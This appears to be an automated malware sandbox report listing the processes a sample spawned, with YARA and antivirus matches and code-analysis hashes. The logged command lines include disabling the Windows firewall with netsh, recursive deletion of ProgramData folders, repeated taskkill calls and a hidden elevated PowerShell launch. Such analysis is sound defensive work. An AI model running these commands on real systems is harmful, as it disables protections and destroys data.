                                                                                                                                                                                Path:C:\Windows\System32\taskkill.exe
                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                Commandline:taskkill /IM
                                                                                                                                                                                Imagebase:0x7ff6bbfa0000
                                                                                                                                                                                File size:94720 bytes
                                                                                                                                                                                MD5 hash:530C6A6CBA137EAA7021CEF9B234E8D4
                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                Programmed in:C, C++ or other language

                                                                                                                                                                                General

                                                                                                                                                                                Start time:12:27:02
                                                                                                                                                                                Start date:11/11/2021
                                                                                                                                                                                Path:C:\ProgramData\UpSys.exe
                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                Commandline:"C:\ProgramData\UpSys.exe" /TI/ /SW:0 powershell.exe
                                                                                                                                                                                Imagebase:0x140000000
                                                                                                                                                                                File size:945944 bytes
                                                                                                                                                                                MD5 hash:EFE5769E37BA37CF4607CB9918639932
                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                Yara matches:
                                                                                                                                                                                • Rule: MAL_Sednit_DelphiDownloader_Apr18_2, Description: Detects malware from Sednit Delphi Downloader report, Source: 00000048.00000002.505878265.00000000007ED000.00000004.00000001.sdmp, Author: Florian Roth
                                                                                                                                                                                • Rule: MAL_Sednit_DelphiDownloader_Apr18_2, Description: Detects malware from Sednit Delphi Downloader report, Source: 00000048.00000003.488087927.0000000002FE1000.00000004.00000001.sdmp, Author: Florian Roth

                                                                                                                                                                                General

                                                                                                                                                                                Start time:12:27:03
                                                                                                                                                                                Start date:11/11/2021
                                                                                                                                                                                Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                Commandline:"C:\Windows\System32\cmd.exe" /K taskkill /IM
                                                                                                                                                                                Imagebase:0x7ff7eef80000
                                                                                                                                                                                File size:273920 bytes
                                                                                                                                                                                MD5 hash:4E2ACF4F8A396486AB4268C94A6A245F
                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                Programmed in:C, C++ or other language

                                                                                                                                                                                General

                                                                                                                                                                                Start time:12:27:03
                                                                                                                                                                                Start date:11/11/2021
                                                                                                                                                                                Path:C:\Users\user\AppData\Local\Temp\vms\vms.exe
                                                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                                                Commandline:"C:\Users\user\AppData\Local\Temp\vms\vms.exe"
                                                                                                                                                                                Imagebase:0x10000
                                                                                                                                                                                File size:2588967 bytes
                                                                                                                                                                                MD5 hash:34CCA2013EB9B2941A65971919BF356D
                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                Antivirus matches:
                                                                                                                                                                                • Detection: 100%, Joe Sandbox ML
                                                                                                                                                                                • Detection: 50%, ReversingLabs

                                                                                                                                                                                General

                                                                                                                                                                                Start time:12:27:03
                                                                                                                                                                                Start date:11/11/2021
                                                                                                                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                Imagebase:0x7ff7ecfc0000
                                                                                                                                                                                File size:625664 bytes
                                                                                                                                                                                MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                Programmed in:C, C++ or other language

                                                                                                                                                                                General

                                                                                                                                                                                Start time:12:27:04
                                                                                                                                                                                Start date:11/11/2021
                                                                                                                                                                                Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                Commandline:"C:\Windows\System32\cmd.exe" /K del /S /Q C:\ProgramData\Data\* && exit
                                                                                                                                                                                Imagebase:0x7ff7eef80000
                                                                                                                                                                                File size:273920 bytes
                                                                                                                                                                                MD5 hash:4E2ACF4F8A396486AB4268C94A6A245F
                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                Programmed in:C, C++ or other language

                                                                                                                                                                                General

                                                                                                                                                                                Start time:12:27:04
                                                                                                                                                                                Start date:11/11/2021
                                                                                                                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                Imagebase:0x7ff7ecfc0000
                                                                                                                                                                                File size:625664 bytes
                                                                                                                                                                                MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                Programmed in:C, C++ or other language

                                                                                                                                                                                General

                                                                                                                                                                                Start time:12:27:05
                                                                                                                                                                                Start date:11/11/2021
                                                                                                                                                                                Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                Commandline:"C:\Windows\System32\cmd.exe" /K del /S /Q C:\ProgramData\Systemd\* && exit
                                                                                                                                                                                Imagebase:0x7ff7eef80000
                                                                                                                                                                                File size:273920 bytes
                                                                                                                                                                                MD5 hash:4E2ACF4F8A396486AB4268C94A6A245F
                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                Programmed in:C, C++ or other language

                                                                                                                                                                                General

                                                                                                                                                                                Start time:12:27:05
                                                                                                                                                                                Start date:11/11/2021
                                                                                                                                                                                Path:C:\Windows\System32\taskkill.exe
                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                Commandline:taskkill /IM
                                                                                                                                                                                Imagebase:0x7ff7db4b0000
                                                                                                                                                                                File size:94720 bytes
                                                                                                                                                                                MD5 hash:530C6A6CBA137EAA7021CEF9B234E8D4
                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                Programmed in:C, C++ or other language

                                                                                                                                                                                General

                                                                                                                                                                                Start time:12:27:05
                                                                                                                                                                                Start date:11/11/2021
                                                                                                                                                                                Path:C:\ProgramData\UpSys.exe
                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                Commandline:"C:\ProgramData\UpSys.exe" /SW:0 powershell.exe
                                                                                                                                                                                Imagebase:0x140000000
                                                                                                                                                                                File size:945944 bytes
                                                                                                                                                                                MD5 hash:EFE5769E37BA37CF4607CB9918639932
                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                Yara matches:
                                                                                                                                                                                • Rule: MAL_Sednit_DelphiDownloader_Apr18_2, Description: Detects malware from Sednit Delphi Downloader report, Source: 00000050.00000003.513976385.0000000003011000.00000004.00000001.sdmp, Author: Florian Roth
                                                                                                                                                                                • Rule: MAL_Sednit_DelphiDownloader_Apr18_2, Description: Detects malware from Sednit Delphi Downloader report, Source: 00000050.00000002.521205790.00000000007EB000.00000004.00000001.sdmp, Author: Florian Roth

                                                                                                                                                                                General

                                                                                                                                                                                Start time:12:27:06
                                                                                                                                                                                Start date:11/11/2021
                                                                                                                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                Imagebase:0x7ff7ecfc0000
                                                                                                                                                                                File size:625664 bytes
                                                                                                                                                                                MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                Programmed in:C, C++ or other language

                                                                                                                                                                                General

                                                                                                                                                                                Start time:12:27:07
                                                                                                                                                                                Start date:11/11/2021
                                                                                                                                                                                Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                Commandline:"C:\Windows\System32\cmd.exe" /K taskkill /IM
                                                                                                                                                                                Imagebase:0x7ff7eef80000
                                                                                                                                                                                File size:273920 bytes
                                                                                                                                                                                MD5 hash:4E2ACF4F8A396486AB4268C94A6A245F
                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                Programmed in:C, C++ or other language

                                                                                                                                                                                General

                                                                                                                                                                                Start time:12:27:07
                                                                                                                                                                                Start date:11/11/2021
                                                                                                                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                Imagebase:0x7ff7ecfc0000
                                                                                                                                                                                File size:625664 bytes
                                                                                                                                                                                MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                Programmed in:C, C++ or other language

                                                                                                                                                                                General

                                                                                                                                                                                Start time:12:27:07
                                                                                                                                                                                Start date:11/11/2021
                                                                                                                                                                                Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                Commandline:"C:\Windows\System32\cmd.exe" /K del /S /Q C:\ProgramData\Systemd\* && exit
                                                                                                                                                                                Imagebase:0x7ff7eef80000
                                                                                                                                                                                File size:273920 bytes
                                                                                                                                                                                MD5 hash:4E2ACF4F8A396486AB4268C94A6A245F
                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                Programmed in:C, C++ or other language

                                                                                                                                                                                General

                                                                                                                                                                                Start time:12:27:08
                                                                                                                                                                                Start date:11/11/2021
                                                                                                                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                Imagebase:0x7ff7ecfc0000
                                                                                                                                                                                File size:625664 bytes
                                                                                                                                                                                MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                Programmed in:C, C++ or other language

                                                                                                                                                                                General

                                                                                                                                                                                Start time:12:27:08
                                                                                                                                                                                Start date:11/11/2021
                                                                                                                                                                                Path:C:\Windows\System32\taskkill.exe
                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                Commandline:taskkill /IM
                                                                                                                                                                                Imagebase:0x7ff7db4b0000
                                                                                                                                                                                File size:94720 bytes
                                                                                                                                                                                MD5 hash:530C6A6CBA137EAA7021CEF9B234E8D4
                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                Programmed in:C, C++ or other language

                                                                                                                                                                                General

                                                                                                                                                                                Start time:12:27:09
                                                                                                                                                                                Start date:11/11/2021
                                                                                                                                                                                Path:C:\Windows\System32\netsh.exe
                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                Commandline:"C:\Windows\system32\netsh.exe" advfirewall set allprofiles state off
                                                                                                                                                                                Imagebase:0x7ff7db9c0000
                                                                                                                                                                                File size:92672 bytes
                                                                                                                                                                                MD5 hash:98CC37BBF363A38834253E22C80A8F32
                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                Programmed in:C, C++ or other language

                                                                                                                                                                                General

                                                                                                                                                                                Start time:12:27:11
                                                                                                                                                                                Start date:11/11/2021
                                                                                                                                                                                Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
                                                                                                                                                                                Imagebase:0x7ff617cb0000
                                                                                                                                                                                File size:447488 bytes
                                                                                                                                                                                MD5 hash:95000560239032BC68B4C2FDFCDEF913
                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                Programmed in:.Net C# or VB.NET

                                                                                                                                                                                General

                                                                                                                                                                                Start time:12:27:11
                                                                                                                                                                                Start date:11/11/2021
                                                                                                                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                Imagebase:0x7ff7ecfc0000
                                                                                                                                                                                File size:625664 bytes
                                                                                                                                                                                MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                Programmed in:C, C++ or other language

                                                                                                                                                                                General

                                                                                                                                                                                Start time:12:27:12
                                                                                                                                                                                Start date:11/11/2021
                                                                                                                                                                                Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                Commandline:"C:\Windows\System32\cmd.exe" /K taskkill /IM
                                                                                                                                                                                Imagebase:0x7ff7eef80000
                                                                                                                                                                                File size:273920 bytes
                                                                                                                                                                                MD5 hash:4E2ACF4F8A396486AB4268C94A6A245F
                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                Programmed in:C, C++ or other language

                                                                                                                                                                                General

                                                                                                                                                                                Start time:12:27:12
                                                                                                                                                                                Start date:11/11/2021
                                                                                                                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                Imagebase:0x7ff7ecfc0000
                                                                                                                                                                                File size:625664 bytes
                                                                                                                                                                                MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                Programmed in:C, C++ or other language

                                                                                                                                                                                General

                                                                                                                                                                                Start time:12:27:13
                                                                                                                                                                                Start date:11/11/2021
                                                                                                                                                                                Path:C:\Windows\System32\taskkill.exe
                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                Commandline:taskkill /IM
                                                                                                                                                                                Imagebase:0x7ff7db4b0000
                                                                                                                                                                                File size:94720 bytes
                                                                                                                                                                                MD5 hash:530C6A6CBA137EAA7021CEF9B234E8D4
                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                Programmed in:C, C++ or other language

                                                                                                                                                                                General

                                                                                                                                                                                Start time:12:27:13
                                                                                                                                                                                Start date:11/11/2021
                                                                                                                                                                                Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                Commandline:"C:\Windows\System32\cmd.exe" /K taskkill /IM
                                                                                                                                                                                Imagebase:0x7ff7eef80000
                                                                                                                                                                                File size:273920 bytes
                                                                                                                                                                                MD5 hash:4E2ACF4F8A396486AB4268C94A6A245F
                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                Programmed in:C, C++ or other language

                                                                                                                                                                                General

                                                                                                                                                                                Start time:12:27:14
                                                                                                                                                                                Start date:11/11/2021
                                                                                                                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                Imagebase:0x7ff7ecfc0000
                                                                                                                                                                                File size:625664 bytes
                                                                                                                                                                                MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                Programmed in:C, C++ or other language

                                                                                                                                                                                General

                                                                                                                                                                                Start time:12:27:14
                                                                                                                                                                                Start date:11/11/2021
                                                                                                                                                                                Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                Commandline:"C:\Windows\System32\cmd.exe" /K del /S /Q C:\ProgramData\Data\* && exit
                                                                                                                                                                                Imagebase:0x7ff7eef80000
                                                                                                                                                                                File size:273920 bytes
                                                                                                                                                                                MD5 hash:4E2ACF4F8A396486AB4268C94A6A245F
                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                Programmed in:C, C++ or other language

                                                                                                                                                                                General

                                                                                                                                                                                Start time:12:27:14
                                                                                                                                                                                Start date:11/11/2021
                                                                                                                                                                                Path:C:\Windows\System32\taskkill.exe
                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                Commandline:taskkill /IM
                                                                                                                                                                                Imagebase:0x7ff7db4b0000
                                                                                                                                                                                File size:94720 bytes
                                                                                                                                                                                MD5 hash:530C6A6CBA137EAA7021CEF9B234E8D4
                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                Programmed in:C, C++ or other language

                                                                                                                                                                                General

                                                                                                                                                                                Start time:12:27:15
                                                                                                                                                                                Start date:11/11/2021
                                                                                                                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                Imagebase:0x7ff7ecfc0000
                                                                                                                                                                                File size:625664 bytes
                                                                                                                                                                                MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                Programmed in:C, C++ or other language

                                                                                                                                                                                General

                                                                                                                                                                                Start time:12:27:15
                                                                                                                                                                                Start date:11/11/2021
                                                                                                                                                                                Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                Commandline:"C:\Windows\System32\cmd.exe" /K del /S /Q C:\ProgramData\Systemd\* && exit
                                                                                                                                                                                Imagebase:0x7ff7eef80000
                                                                                                                                                                                File size:273920 bytes
                                                                                                                                                                                MD5 hash:4E2ACF4F8A396486AB4268C94A6A245F
                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                Programmed in:C, C++ or other language

                                                                                                                                                                                General

                                                                                                                                                                                Start time:12:27:15
                                                                                                                                                                                Start date:11/11/2021
                                                                                                                                                                                Path:C:\ProgramData\UpSys.exe
                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                Commandline:"C:\ProgramData\UpSys.exe" /SW:0 powershell.exe
                                                                                                                                                                                Imagebase:0x140000000
                                                                                                                                                                                File size:945944 bytes
                                                                                                                                                                                MD5 hash:EFE5769E37BA37CF4607CB9918639932
                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                Yara matches:
                                                                                                                                                                                • Rule: MAL_Sednit_DelphiDownloader_Apr18_2, Description: Detects malware from Sednit Delphi Downloader report, Source: 00000064.00000003.513753577.0000000003051000.00000004.00000001.sdmp, Author: Florian Roth

                                                                                                                                                                                General

                                                                                                                                                                                Start time:12:27:15
                                                                                                                                                                                Start date:11/11/2021
                                                                                                                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                Imagebase:0x7ff7ecfc0000
                                                                                                                                                                                File size:625664 bytes
                                                                                                                                                                                MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                Programmed in:C, C++ or other language

                                                                                                                                                                                General

                                                                                                                                                                                Start time:12:27:16
                                                                                                                                                                                Start date:11/11/2021
                                                                                                                                                                                Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                Commandline:"C:\Windows\System32\cmd.exe" /K taskkill /IM
                                                                                                                                                                                Imagebase:0x7ff7eef80000
                                                                                                                                                                                File size:273920 bytes
                                                                                                                                                                                MD5 hash:4E2ACF4F8A396486AB4268C94A6A245F
                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                Programmed in:C, C++ or other language

                                                                                                                                                                                General

                                                                                                                                                                                Start time:12:27:17
                                                                                                                                                                                Start date:11/11/2021
                                                                                                                                                                                Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                Commandline:"C:\Windows\System32\cmd.exe" /K taskkill /IM
                                                                                                                                                                                Imagebase:0x7ff7eef80000
                                                                                                                                                                                File size:273920 bytes
                                                                                                                                                                                MD5 hash:4E2ACF4F8A396486AB4268C94A6A245F
                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                Programmed in:C, C++ or other language

                                                                                                                                                                                General

                                                                                                                                                                                Start time:12:27:17
                                                                                                                                                                                Start date:11/11/2021
                                                                                                                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                Imagebase:0x7ff7ecfc0000
                                                                                                                                                                                File size:625664 bytes
                                                                                                                                                                                MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                Programmed in:C, C++ or other language

                                                                                                                                                                                General

                                                                                                                                                                                Start time:12:27:17
                                                                                                                                                                                Start date:11/11/2021
                                                                                                                                                                                Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                Commandline:"C:\Windows\System32\cmd.exe" /K del /S /Q C:\ProgramData\Systemd\* && exit
                                                                                                                                                                                Imagebase:0x7ff7eef80000
                                                                                                                                                                                File size:273920 bytes
                                                                                                                                                                                MD5 hash:4E2ACF4F8A396486AB4268C94A6A245F
                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                Programmed in:C, C++ or other language

                                                                                                                                                                                General

                                                                                                                                                                                Start time:12:27:18
                                                                                                                                                                                Start date:11/11/2021
                                                                                                                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                Imagebase:0x7ff7ecfc0000
                                                                                                                                                                                File size:625664 bytes
                                                                                                                                                                                MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                Programmed in:C, C++ or other language

                                                                                                                                                                                General

                                                                                                                                                                                Start time:12:27:18
                                                                                                                                                                                Start date:11/11/2021
                                                                                                                                                                                Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                Commandline:"C:\Windows\System32\cmd.exe" /K del /S /Q C:\ProgramData\Systemd\* && exit
                                                                                                                                                                                Imagebase:0x7ff7eef80000
                                                                                                                                                                                File size:273920 bytes
                                                                                                                                                                                MD5 hash:4E2ACF4F8A396486AB4268C94A6A245F
                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                Programmed in:C, C++ or other language

                                                                                                                                                                                General

                                                                                                                                                                                Start time:12:27:18
                                                                                                                                                                                Start date:11/11/2021
                                                                                                                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                Imagebase:0x7ff7ecfc0000
                                                                                                                                                                                File size:625664 bytes
                                                                                                                                                                                MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                Programmed in:C, C++ or other language

                                                                                                                                                                                General

                                                                                                                                                                                Start time:12:27:18
                                                                                                                                                                                Start date:11/11/2021
                                                                                                                                                                                Path:C:\Windows\System32\taskkill.exe
                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                Commandline:taskkill /IM
                                                                                                                                                                                Imagebase:0x7ff7db4b0000
                                                                                                                                                                                File size:94720 bytes
                                                                                                                                                                                MD5 hash:530C6A6CBA137EAA7021CEF9B234E8D4
                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                Programmed in:C, C++ or other language

                                                                                                                                                                                Disassembly

                                                                                                                                                                                Code Analysis

                                                                                                                                                                                Reset < >

                                                                                                                                                                                  Executed Functions

                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000001.00000002.388189102.0000000003CA0000.00000040.00000001.sdmp, Offset: 03CA0000, based on PE: false
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                  • Opcode ID: c4e38225528945061e8868145efad1045d76be1877b9ef0132be5a3a8c11ac18
                                                                                                                                                                                  • Instruction ID: e5b7fbcdbe031f0cf51bdc2225f78012e2169d2b3bbddea2e8c454b6099579a4
                                                                                                                                                                                  • Opcode Fuzzy Hash: c4e38225528945061e8868145efad1045d76be1877b9ef0132be5a3a8c11ac18
                                                                                                                                                                                  • Instruction Fuzzy Hash: 3C130E78912204DFDF269B61D450AD9B772FFAA30AB1584BADC1526B60CB3FC846DF01
                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000001.00000002.388189102.0000000003CA0000.00000040.00000001.sdmp, Offset: 03CA0000, based on PE: false
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID: 8c:l
                                                                                                                                                                                  • API String ID: 0-1072138529
                                                                                                                                                                                  • Opcode ID: 9eac0ed022576db483f64a98e4a09746a21ad2b51e6c5b392fb6aa21ee6cc1cf
                                                                                                                                                                                  • Instruction ID: d50643e1f9b448407a9c888004830c5fa7c305b3a7333d393f58b0293a68dc7e
                                                                                                                                                                                  • Opcode Fuzzy Hash: 9eac0ed022576db483f64a98e4a09746a21ad2b51e6c5b392fb6aa21ee6cc1cf
                                                                                                                                                                                  • Instruction Fuzzy Hash: 3C51E4357105088FCB04FBB9E5544AEBBB6FFCA318B548619E0929B7D8DF309819CB52
                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000001.00000002.388189102.0000000003CA0000.00000040.00000001.sdmp, Offset: 03CA0000, based on PE: false
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                  • Opcode ID: 91a0fed61839d687123a9d8ddc63a2a48e7f1b343bc7873b0593ccba14ab41aa
                                                                                                                                                                                  • Instruction ID: 6e4617762aad956b6881a8d5ec985b75818417677d6307699dcb04498e0eebbc
                                                                                                                                                                                  • Opcode Fuzzy Hash: 91a0fed61839d687123a9d8ddc63a2a48e7f1b343bc7873b0593ccba14ab41aa
                                                                                                                                                                                  • Instruction Fuzzy Hash: 05517E38A11205DFCB08EFB9E5986ADBBB2EF88209F15442AE546E7390DF315C42CF51
                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000001.00000002.388189102.0000000003CA0000.00000040.00000001.sdmp, Offset: 03CA0000, based on PE: false
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                  • Opcode ID: a27499e41126d442451766289ba2c085605464e36dc597d1a55bdb4eee09c703
                                                                                                                                                                                  • Instruction ID: 38d3d3d034fea41f774e17bd26664913df24e2f087d840ee4252b214c862128c
                                                                                                                                                                                  • Opcode Fuzzy Hash: a27499e41126d442451766289ba2c085605464e36dc597d1a55bdb4eee09c703
                                                                                                                                                                                  • Instruction Fuzzy Hash: C9516D38E112159FCB04EFB9E5586ADBBB2EF88209F15842AE546E7390DF315C42CF51
                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000001.00000002.388189102.0000000003CA0000.00000040.00000001.sdmp, Offset: 03CA0000, based on PE: false
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                  • Opcode ID: 1daf6c39379838313b260eac1cf73213db753dd98eeb054f7e79efd7c7bb452a
